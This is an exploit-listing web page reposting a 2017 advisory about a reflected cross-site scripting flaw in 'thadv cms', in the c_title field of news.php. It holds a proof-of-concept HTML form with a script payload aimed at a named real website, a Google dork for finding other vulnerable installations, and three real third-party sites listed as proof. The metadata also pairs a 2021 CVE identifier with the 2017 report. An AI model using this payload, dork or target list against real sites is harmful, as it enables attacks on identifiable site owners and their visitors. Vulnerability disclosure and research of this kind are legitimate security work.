Advertisement






thadv cms Cross-Site Scripting XSS Reflected Vulnerability

CVE Category Price Severity
CVE-2021-26408 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-08-22
CPE
cpe:cpe:/a:thadv:cms
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017080155

Below is a copy:

thadv cms Cross-Site Scripting XSS Reflected Vulnerability ==============================================
# Exploit Title : thadv cms Cross-Site Scripting(XSS/Reflected) vulnerability 
# Reported Date : 8 - 22 - 2017
# Exploit Author : Ashiyane Digital Security Team
# Tested On :  kali Linux
# Vendor Homepage :  http://thadv.com   
# Google Dork : intext:"Website designed by THADV"  
==============================================

-----------------------------
vulnerability discovered by :

sir shahroukh 

-----------------------------
vulnerability Path :

http://Target/news/news.php 
-----------------------------

vulnerability File:

news.php
-----------------------------

vulnerability Method :

_POST[]
-----------------------------

vulnerability Variable:

c_title
-----------------------------
 
Vulnerability code :


<form method='POST' name='page1'  action='news.php?
class1=&class2=&class3=&search=&
c_title=%5C%5C%5C%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page='
 target='_self'><span>0</span> <span>1
</span>  <INPUT size='1' name='page_input'> 
<input type='submit' name='Submit3' value=' GO ' class='tj'> 
 </form> 
 
-----------------------------
 
Exploit code :
 
<form method='POST' name='page1'  
action='http://www.renshinkan.tw/news/news.php?class1=&class2=
&class3=&search=&c_title='/></title><script>alert(1)</script>&page=' 
      target='_self'><span>0</span> <span>1</span>
      <INPUT size='1' name='page_input'>
 <input type='submit' name='Submit3' value=' GO ' class='tj'> 
</form> 

-----------------------------

Proof :

http://www.renshinkan.tw/news/news.php

http://www.sanna.com.tw/news/news.php

http://www.letsgowithlasco.com/news/news.php

==============================================|

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.